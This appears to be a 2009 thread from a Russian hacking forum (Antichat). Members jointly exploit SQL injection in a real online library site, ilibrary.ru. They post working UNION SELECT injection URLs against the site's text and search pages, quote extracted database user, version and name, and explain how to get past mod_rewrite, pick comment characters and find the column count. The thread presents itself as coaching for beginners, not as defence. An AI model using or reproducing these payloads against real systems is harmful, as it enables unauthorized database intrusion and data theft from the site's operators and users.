28.01.2009, 15:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Corwin
пробелы меняем на /**/
ахахаха... там ведь мод реврайт и все / ситаются разделителями 
|
|
|
28.01.2009, 15:15
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от Corwin
пробелы меняем на /**/
не поможет, тк там mod_rewrite передает все на файл index.phtml, который как раз в REQUEST_URI заменяет = на точку, применяет urlencode и разбивает его на массив по слешам.
=/ чет запоздал с ответом
Последний раз редактировалось oRb; 28.01.2009 в 15:18..
|
|
|
|
28.01.2009, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да там даже вывод есть:
ilibrary_il@localhost:4.0.27-standard-log:ilibrary_ilibrary («ilibrary_il@localhost»)
|
|
|
|
28.01.2009, 15:40
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
В общем путём долгих манипуляций удалось понять какие поля уводят цикл обработки содержания в бесконечный цикл и исключить их, этот запрос даёт нормальный вывод:
http://ilibrary.ru/text/1320/?p=999))+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONC AT_WS(0x3a,USER(),VERSION(),DATABASE()),13,14,15,1 6,17,18,19,20,21,22,23,USER(),25%23
|
|
|
|
28.01.2009, 15:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А как там вывод определить ? оО
ЗЫ: А твой метод борьбы я вообще не догнал))
Последний раз редактировалось Велемир; 28.01.2009 в 15:48..
|
|
|
|
28.01.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
%23 это ещё один вариант комментария в SQL (#), который у них не фильтруется, кол-во колонок было подобрано с помощью ORDER BY, т.к. одно из 25 полей приводило к бесконечному циклу я сначала во все поля засунул USER и посмотрел где идёт вывод, потом убрал лишние, нашёл поле, которое глючит (24 поле), оставил в нём строку и выставил уважаемым на обозрение...
|
|
|
|
28.01.2009, 16:02
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Код:
http://ilibrary.ru/search.phtml?q=1%27)+union+select+version(),2,lastname,4+from+autors/*
|
|
|
|
28.01.2009, 16:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
groundhog да у них ничего не фильтруется, будет работать и +--+ и /*, ты сейчас запутаешь новичков 
Просто нужно изначально обращение в обход mod_rewrite
Тоесть
http://ilibrary.ru/text/1320/p.1
=
http://ilibrary.ru/text/1320/?p=1
ну и с выводом, конечно молодец, мне терпения не хватило разбираться
|
|
|
|
28.01.2009, 16:15
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой:
)) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id
 |
|
|
|
28.01.2009, 16:21
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Велемир
А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой:
)) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id
Не %2523, а 25%23. Последний столбец 25 и #
По поводу скобок внимательно прочитай, что ошибка пишет "неверный синтаксис ВОЗЛЕ ))" тоесть в запросе их нужно закрыть
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
